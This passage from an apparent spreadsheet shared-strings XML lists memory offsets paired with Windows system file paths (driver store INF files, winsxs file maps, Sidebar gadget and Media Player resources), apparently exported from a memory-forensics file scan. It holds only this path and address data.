    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_travel_c63680851907e918.cdf-</t>
  </si>
  <si>
    <t>0xde785b30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\msdri.inf_x86_neutral_86bb50f34c49ae71\msdri.inf_x001B_</t>
  </si>
  <si>
    <t>0xde785c50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_stacking_dcc38bcea7f2f1e4.cd</t>
  </si>
  <si>
    <t>0xde7862a8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\adpu320.inf_x86_neutral_4ea3d42a9839982a\adpu320.</t>
  </si>
  <si>
    <t>0xde7863c8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_internet_explorer_en-us_2650c83f8a48b821.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7867b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_internet_explorer_a421d1bfaf856e2b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde786b98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_ffd0cbfc813cc4f1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde786e60</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ksfilter.inf_x86_neutral_92aac3fbbef4a5e4\ksfilte</t>
  </si>
  <si>
    <t>0xde786f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_vignette_f1288c9089f4958a.cd</t>
  </si>
  <si>
    <t>0xde787358</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_internet_explorer_images_970ee9acd2503f65.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde787508</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netimm.inf_x86_neutral_9b64397618841a19\netimm.in</t>
  </si>
  <si>
    <t>0xde787720</t>
  </si>
  <si>
    <t>\Program Files\Internet Explorer\en-US\iexplore.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde787c38</t>
  </si>
  <si>
    <t>0xde787f80</t>
  </si>
  <si>
    <t>\Program Files\Internet Explorer\en-US\ieinstal.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde788468</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\vboxvideo.inf_x86_neutral_4b79b2b5a7db9621\VBoxVi</t>
  </si>
  <si>
    <t>deo.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde788730</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netrndis.inf_x86_neutral_1c5becb2deac08f0\netrndi</t>
  </si>
  <si>
    <t>0xde788850</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_reference_assemblies_microsoft_framework_v3.0_44577d982</t>
  </si>
  <si>
    <t>216c291.cdf-m</t>
  </si>
  <si>
    <t>0xde788d38</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_msbuild_microsoft_windows_workflow_foundation_v3.5_06f0</t>
  </si>
  <si>
    <t>ac2a38886194.</t>
  </si>
  <si>
    <t>0xde788eb8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\infstrng.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde789038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnkm004.inf_x86_neutral_b456c14d5367f83c\prnkm00</t>
  </si>
  <si>
    <t>0xde789198</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnova.inf_x86_neutral_81c772e3350d17f3\mdmnova.</t>
  </si>
  <si>
    <t>0xde7894a8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_reference_assemblies_microsoft_framework_v3.5_redistlis</t>
  </si>
  <si>
    <t>t_bd550cc45cc</t>
  </si>
  <si>
    <t>12a27.cdf-m</t>
  </si>
  <si>
    <t>0xde789690</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_reference_assemblies_microsoft_framework_v3.5_44577da22</t>
  </si>
  <si>
    <t>216c264.cdf-m</t>
  </si>
  <si>
    <t>0xde789b78</t>
  </si>
  <si>
    <t>0xde789d60</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_reference_assemblies_microsoft_framework_v3.0_subsetlis</t>
  </si>
  <si>
    <t>t_717872f9b22</t>
  </si>
  <si>
    <t>21111.cdf-m</t>
  </si>
  <si>
    <t>0xde78a2d0</t>
  </si>
  <si>
    <t>0xde78a420</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\lsi_scsi.inf_x86_neutral_cfbbf0b0b66ba280\lsi_scs</t>
  </si>
  <si>
    <t>0xde78a808</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_defender_3e33901162166ae9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78acb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_reference_assemblies_microsoft_framework_v3.5_subsetlis</t>
  </si>
  <si>
    <t>t_76650e039bf</t>
  </si>
  <si>
    <t>95764.cdf-m</t>
  </si>
  <si>
    <t>0xde78b348</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00c.inf_x86_neutral_9339602328d9603b\prnca00</t>
  </si>
  <si>
    <t>0xde78b400</t>
  </si>
  <si>
    <t>\Program Files\Windows Mail\en-US\msoeres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78b950</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_mail_en-us_4eecf28483baad93.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78be00</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_mail_e07902f329fe05e9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78bf80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_defender_en-us_a607fb510b9fff95.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78c038</t>
  </si>
  <si>
    <t>0xde78c8f0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\msmouse.inf_x86_neutral_7a9084e0177406eb\msmouse.</t>
  </si>
  <si>
    <t>0xde78cb38</t>
  </si>
  <si>
    <t>\Program Files\Windows Mail\en-US\WinMail.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78cc58</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\input.inf_x86_neutral_1436b88c77b8881d\input.inf_x001B_</t>
  </si>
  <si>
    <t>0xde78d1f0</t>
  </si>
  <si>
    <t>\Program Files\Windows Media Player\en-US\wmpnetwk.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78d3d8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_media_player_en-us_94ff97943fc617cd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78d758</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\memory.inf_x86_neutral_0e5e977bd78905af\memory.in</t>
  </si>
  <si>
    <t>0xde78dcd0</t>
  </si>
  <si>
    <t>0xde78deb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_media_player_da4e5f6eb3198de9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78e2e8</t>
  </si>
  <si>
    <t>\Program Files\Windows Media Player\en-US\wmplayer.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78e568</t>
  </si>
  <si>
    <t>\Program Files\Windows Media Player\en-US\setup_wm.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78e7e8</t>
  </si>
  <si>
    <t>\Program Files\Windows Media Player\en-US\wmpnscfg.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78ec38</t>
  </si>
  <si>
    <t>0xde78eee8</t>
  </si>
  <si>
    <t>0xde78f170</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_media_player_media_renderer_5001a1a5de706f6e.cd</t>
  </si>
  <si>
    <t>0xde78f3f0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_media_player_icons_94ff7ddc3fca431d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78f670</t>
  </si>
  <si>
    <t>\Program Files\Windows Media Player\en-US\wmpnssci.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78f8f0</t>
  </si>
  <si>
    <t>\Program Files\Windows Media Player\en-US\mpvis.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78fb70</t>
  </si>
  <si>
    <t>\Program Files\Windows Media Player\en-US\WMPSideShowGadget.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde78fe58</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgen.inf_x86_neutral_a00c4f9ef37d67d0\mdmgen.in</t>
  </si>
  <si>
    <t>0xde7901a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_nt_6101456faac5015c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde790440</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\averfx2swtv.inf_x86_neutral_c099b789396c5410\aver</t>
  </si>
  <si>
    <t>fx2swtv.inf_x001B_[</t>
  </si>
  <si>
    <t>0xde790588</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_media_player_visualizations_e380711fc66b5d12.cd</t>
  </si>
  <si>
    <t>0xde790970</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_media_player_skins_94ff8de43fd42ce5.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde790cd8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl001.inf_x86_neutral_9209e816461a1a73\mdmgl00</t>
  </si>
  <si>
    <t>0xde790e20</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_media_player_network_sharing_aed05552f451fd7d.c</t>
  </si>
  <si>
    <t>0xde791148</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netvwifibus.inf_x86_neutral_9d0740f32ce81d24\netv</t>
  </si>
  <si>
    <t>wifibus.inf_x001B_[</t>
  </si>
  <si>
    <t>0xde791530</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ql2300.inf_x86_neutral_ca8487daf77ff7cb\ql2300.in</t>
  </si>
  <si>
    <t>0xde7915e8</t>
  </si>
  <si>
    <t>\Program Files\Windows NT\Accessories\en-US\wordpad.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7919d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_nt_accessories_en-us_4cfa7c92c2470350.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde791db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_nt_accessories_156d2b9b22040474.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde792150</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\adp94xx.inf_x86_neutral_4928c8870f6a1577\adp94xx.</t>
  </si>
  <si>
    <t>0xde792270</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_photo_viewer_en-us_bb1893748d4240dc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde792720</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_photo_viewer_6eb173d8debcda9a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde792ae0</t>
  </si>
  <si>
    <t>0xde792c30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_nt_tabletextservice_en-us_0e46adde4b3af550.cdf-</t>
  </si>
  <si>
    <t>0xde792f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_nt_tabletextservice_9475b2de2d92bc74.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7931b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl006.inf_x86_neutral_e5693eb731048022\mdmgl00</t>
  </si>
  <si>
    <t>0xde793300</t>
  </si>
  <si>
    <t>\Program Files\Windows Sidebar\en-US\sbdrop.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7936e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_en-us_467d8a71f43f36ce.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7939b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmdcm5.inf_x86_neutral_f7e102d648101629\mdmdcm5.</t>
  </si>
  <si>
    <t>0xde793ad0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_8d6dbc4becba56da.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde793eb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_portable_devices_8ef3f2c72e8bb2ba.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde794280</t>
  </si>
  <si>
    <t>\Windows\System32\msconfig.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde794538</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_calendar.gadget_b054eca6667f306</t>
  </si>
  <si>
    <t>0xde7947b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_265d2ddf4d58a723.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde794aa0</t>
  </si>
  <si>
    <t>\Program Files\Windows Sidebar\en-US\Sidebar.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde794f80</t>
  </si>
  <si>
    <t>0xde795038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_calendar.gadget_en-us_css_4d835</t>
  </si>
  <si>
    <t>24d9d6217bc.c</t>
  </si>
  <si>
    <t>0xde7953b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_calendar.gadget_images_e8b234ae</t>
  </si>
  <si>
    <t>384ba7b1.cdf-</t>
  </si>
  <si>
    <t>0xde795680</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\usb.inf_x86_neutral_d40acdfd3fb82a3c\usb.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7957a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_calendar.gadget_en-us_js_45a8e2</t>
  </si>
  <si>
    <t>05c0b938de.cd</t>
  </si>
  <si>
    <t>0xde795b88</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_calendar.gadget_en-us_e8aa0ae29</t>
  </si>
  <si>
    <t>7615c6d.cdf-m</t>
  </si>
  <si>
    <t>0xde795f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\net1k32.inf_x86_neutral_78f8b10949489fd3\net1k32.</t>
  </si>
  <si>
    <t>0xde7963c8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_clock.gadget_en-us_js_2690dfedc</t>
  </si>
  <si>
    <t>0f833b4.cdf-m</t>
  </si>
  <si>
    <t>0xde796668</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mshdc.inf_x86_neutral_a5025d31bee4647c\mshdc.inf_x001B_</t>
  </si>
  <si>
    <t>0xde7967b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_clock.gadget_en-us_css_2690e0e9</t>
  </si>
  <si>
    <t>9412a2f4.cdf-</t>
  </si>
  <si>
    <t>0xde796b98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_clock.gadget_en-us_b92194be8e78</t>
  </si>
  <si>
    <t>846b.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde796e38</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\qd3x86.inf_x86_neutral_b4bd3d3a68e99799\qd3x86.in</t>
  </si>
  <si>
    <t>0xde796f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_clock.gadget_85cde96256fb59df.c</t>
  </si>
  <si>
    <t>0xde797450</t>
  </si>
  <si>
    <t>0xde7975a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_cpu.gadget_en-us_268aa9af5ba2d0</t>
  </si>
  <si>
    <t>5f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde797788</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_cpu.gadget_3ea229fc96d38c13.cdf</t>
  </si>
  <si>
    <t>0xde797ad0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_cpu.gadget_images_987b0ad259a48</t>
  </si>
  <si>
    <t>06b.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde797f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_clock.gadget_images_11f95cf6093</t>
  </si>
  <si>
    <t>8de7b.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde798038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_cpu.gadget_en-us_js_e0a0cbba78d</t>
  </si>
  <si>
    <t>6d4d6.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde798330</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wvmbushid.inf_x86_neutral_337ff5bbc81c06e8\wvmbus</t>
  </si>
  <si>
    <t>hid.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde798450</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_currency.gadget_964bdce27d2d673</t>
  </si>
  <si>
    <t>4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde798aa8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ts_wpdmtp.inf_x86_neutral_daa64ca27846aa23\ts_wpd</t>
  </si>
  <si>
    <t>mtp.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde798bc8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl004.inf_x86_neutral_1874f16002601f78\mdmgl00</t>
  </si>
  <si>
    <t>0xde798db0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_cpu.gadget_en-us_css_25b24cc85d</t>
  </si>
  <si>
    <t>6f7250.cdf-ms</t>
  </si>
  <si>
    <t>0xde799038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_currency.gadget_en-us_css_cf919</t>
  </si>
  <si>
    <t>8f7f6b7f8df.c</t>
  </si>
  <si>
    <t>0xde799250</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_currency.gadget_images_818b1961</t>
  </si>
  <si>
    <t>0434093a.cdf-</t>
  </si>
  <si>
    <t>0xde7994f0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx002.inf_x86_neutral_b460391110491d41\prnlx00</t>
  </si>
  <si>
    <t>0xde799ac8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_currency.gadget_en-us_js_903751</t>
  </si>
  <si>
    <t>0893ce6463.cd</t>
  </si>
  <si>
    <t>0xde799cb0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_currency.gadget_en-us_8182ef952</t>
  </si>
  <si>
    <t>052028a.cdf-m</t>
  </si>
  <si>
    <t>0xde799ef0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\msclmd.inf_x86_neutral_1984ed5209e72520\msclmd.in</t>
  </si>
  <si>
    <t>0xde79a0f0</t>
  </si>
  <si>
    <t>\Windows\System32\npmproxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde79a360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_mediacenter.gadget_images_15a18</t>
  </si>
  <si>
    <t>af15dc71ee0.c</t>
  </si>
  <si>
    <t>0xde79a748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_mediacenter.gadget_f08b590d1781</t>
  </si>
  <si>
    <t>9d36.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde79a9e8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcrtix.inf_x86_neutral_c14a1ef4ed1fec95\mdmcrti</t>
  </si>
  <si>
    <t>0xde79ab30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_mediacenter.gadget_en-us_0eda41</t>
  </si>
  <si>
    <t>e17d8c829e.cd</t>
  </si>
  <si>
    <t>0xde79af18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_mediacenter.gadget_css_8dda2b51</t>
  </si>
  <si>
    <t>661abce9.cdf-</t>
  </si>
  <si>
    <t>0xde79b1d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_picturepuzzle.gadget_en-us_css_</t>
  </si>
  <si>
    <t>ee4c58e41ef91</t>
  </si>
  <si>
    <t>b16.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde79b470</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\averfx2h826d_noaverir.inf_x86_neutral_4663ffee9c0</t>
  </si>
  <si>
    <t>9b012\averfx2</t>
  </si>
  <si>
    <t>h826d_noave</t>
  </si>
  <si>
    <t>rir.in</t>
  </si>
  <si>
    <t>0xde79b5b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_picturepuzzle.gadget_en-us_40e1</t>
  </si>
  <si>
    <t>f69776c7e3c9.</t>
  </si>
  <si>
    <t>0xde79ba68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_picturepuzzle.gadget_284c80f2b1</t>
  </si>
  <si>
    <t>2171b5.cdf-ms</t>
  </si>
  <si>
    <t>0xde79bd08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmvv.inf_x86_neutral_ec2b9772b37353a3\mdmvv.inf_x001B_</t>
  </si>
  <si>
    <t>0xde79be50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_mediacenter.gadget_js_8dda2a54e</t>
  </si>
  <si>
    <t>f707137.cdf-m</t>
  </si>
  <si>
    <t>0xde79c300</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_rssfeeds.gadget_en-us_42036cf02</t>
  </si>
  <si>
    <t>0e8a972.cdf-m</t>
  </si>
  <si>
    <t>0xde79c598</t>
  </si>
  <si>
    <t>0xde79c6e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_rssfeeds.gadget_22ec6b16cd2d39c</t>
  </si>
  <si>
    <t>0xde79c988</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\angel.inf_x86_neutral_8bb84b2b92dfa947\Angel.inf_x001B_</t>
  </si>
  <si>
    <t>0xde79cad0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_picturepuzzle.gadget_images_113</t>
  </si>
  <si>
    <t>209543e53c7d7</t>
  </si>
  <si>
    <t>0xde79ceb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_picturepuzzle.gadget_en-us_js_e</t>
  </si>
  <si>
    <t>e4c57e840f5e5</t>
  </si>
  <si>
    <t>a0.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde79d298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_slideshow.gadget_1d53bb9c29c0aa</t>
  </si>
  <si>
    <t>6d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde79d538</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\nettun.inf_x86_neutral_49694089c24355d2\nettun.in</t>
  </si>
  <si>
    <t>0xde79d680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_rssfeeds.gadget_images_420b96bc</t>
  </si>
  <si>
    <t>9fb8ab54.cdf-</t>
  </si>
  <si>
    <t>0xde79db30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_rssfeeds.gadget_en-us_js_eebbf2</t>
  </si>
  <si>
    <t>2d9f05f549.cd</t>
  </si>
  <si>
    <t>0xde79ddd0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wceisvista.inf_x86_neutral_3500779911f7f3ca\WceIS</t>
  </si>
  <si>
    <t>Vista.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde79df18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_rssfeeds.gadget_en-us_css_adeac</t>
  </si>
  <si>
    <t>7d6c2b30bf7.c</t>
  </si>
  <si>
    <t>0xde79e298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_slideshow.gadget_images_db83d22</t>
  </si>
  <si>
    <t>ffb6579d1.cdf</t>
  </si>
  <si>
    <t>0xde79e680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_slideshow.gadget_en-us_js_ca39c</t>
  </si>
  <si>
    <t>98b64be74a4.c</t>
  </si>
  <si>
    <t>0xde79e920</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmpp.inf_x86_neutral_b53cc77015d962f0\mdmpp.inf_x001B_</t>
  </si>
  <si>
    <t>0xde79ea68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_slideshow.gadget_en-us_css_ca39</t>
  </si>
  <si>
    <t>ca876b477a1a.</t>
  </si>
  <si>
    <t>0xde79ee50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_slideshow.gadget_en-us_23311f02</t>
  </si>
  <si>
    <t>0fdd83c5.cdf-</t>
  </si>
  <si>
    <t>0xde79f1d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_weather.gadget_en-us_css_863292</t>
  </si>
  <si>
    <t>ab8d2936a8.cd</t>
  </si>
  <si>
    <t>0xde79f470</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wpdmtphw.inf_x86_neutral_a7a22bb0bb81abb0\wpdmtph</t>
  </si>
  <si>
    <t>w.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde79f5b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_weather.gadget_a4898b91b8575c47</t>
  </si>
  <si>
    <t>0xde79fa68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_slideshow.gadget_images_on_desk</t>
  </si>
  <si>
    <t>top_8c4fbdc64</t>
  </si>
  <si>
    <t>58a98d1.cdf</t>
  </si>
  <si>
    <t>-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde79fd08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnis5t.inf_x86_neutral_d89a2aded51ecac3\mdmnis5</t>
  </si>
  <si>
    <t>0xde79fe50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_slideshow.gadget_images_in_side</t>
  </si>
  <si>
    <t>bar_845277d66</t>
  </si>
  <si>
    <t>4af085f.cdf</t>
  </si>
  <si>
    <t>0xde7a0038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netr73.inf_x86_neutral_d8d856fa32ab7ec2\netr73.in</t>
  </si>
  <si>
    <t>0xde7a0200</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_weather.gadget_images_144dpi_12</t>
  </si>
  <si>
    <t>b2fa65af7b87a</t>
  </si>
  <si>
    <t>d.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde7a05e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_weather.gadget_images_120dpi_12</t>
  </si>
  <si>
    <t>fb0c15aed95ff</t>
  </si>
  <si>
    <t>3.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde7a0888</t>
  </si>
  <si>
